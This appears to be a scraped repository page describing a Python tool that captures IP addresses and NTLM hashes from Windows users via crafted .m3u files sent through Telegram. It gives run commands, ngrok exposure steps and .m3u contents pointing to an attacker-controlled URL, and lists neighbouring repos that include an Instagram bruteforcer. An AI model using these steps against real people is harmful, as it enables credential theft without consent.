Tautulli /
Tautulli
A Python based monitoring and tracking tool for Plex Media Server.
Loading repository data…
7onez / repository
A Python-based tool designed to capture IP addresses and NTLM authentication hashes from remote Windows clients using Telegram (lack of blocking the file extension .m3u), primarily for security testing and educational purposes.
A Python-based tool designed to capture IP addresses and NTLM authentication hashes from remote Windows clients using Telegram (lack of blocking the file extension .m3u), primarily for security testing and educational purposes.
Credits to: https://x.com/0x6rss/status/1906070098764538201/photo/1 and https://www.facebook.com/share/p/16Q8pGYLqJ/
As of 31/03/2025 - this simple bug it's NOT fixed yet.
For a detailed video walkthrough of the tool in action, see ipltlm.mp4
This tool sets up an HTTP server that:
pip install -r requirements.txt
Run the script with default settings:
python ipntlmhash.py
This will start the server on port 8001 and automatically detect your IP address.
# Specify a custom IP address and port
python ipntlmhash.py --ip 192.168.1.100 --port 8080
# Try alternative ports if the main port fails
python ipntlmhash.py --alt-ports
--ip: Specify the server IP address (default: auto-detect)--port: Specify the port to listen on (default: 8001)--alt-ports: Automatically try alternative ports (80, 443, 8080, 8000) if the primary port failsFor easier public accessibility, especially if you're behind NAT or a firewall, use ngrok:
python ipntlmhash.py
ngrok http 8001
https://a1b2c3d4.ngrok.io)# Edit ntlmv2_hash.m3u to contain:
https://a1b2c3d4.ngrok.io/somefile.mp3
# Edit ip_detect.m3u to contain:
https://a1b2c3d4.ngrok.io/ip
/ip endpoint serves a page with JavaScript that detects the client's public IPip_log.txt: Contains logs of all client connections and reported public IPsntlm_log.txt: Contains captured NTLM authentication dataipltlmhash.m3u: M3U file that tries to capture both IP and NTLM hash when openedip_detect.m3u: M3U file that directs clients to the IP detection pageThis tool is designed for educational purposes and security testing with proper authorization. Unauthorized use of this tool against systems you don't own or have permission to test may violate laws and regulations.
If you're having trouble with connectivity:
Selected from shared topics, language and repository description—not editorial ratings.
Tautulli /
A Python based monitoring and tracking tool for Plex Media Server.
evildevill /
instahack is a bash & python based script which is officially made to test password strength of Instagram account from termux and kali with bruteforce attack and. it based on tor This tool works on both rooted Android device and Non-rooted Android device. Best Tool For Instagram Bruteforce hacking Tool By Waseem Akram.
ysde /
A Python-based application to backup Grafana settings by using the Grafana API
mesquidar /
A python based tool for exploiting and managing Android devices via ADB
NisaarAgharia /
AI-Video-Cropper is a Python-based tool that leverages the power of GPT-4 (OpenAI's language model) to automatically analyze videos, extract the most interesting sections, and crop them for improved viewing experience. This project combines the capabilities of GPT-4, FFmpeg, and OpenCV to automate the process of identifying highlights in videos
jobroche /
A python based LinkedIn enumeration tool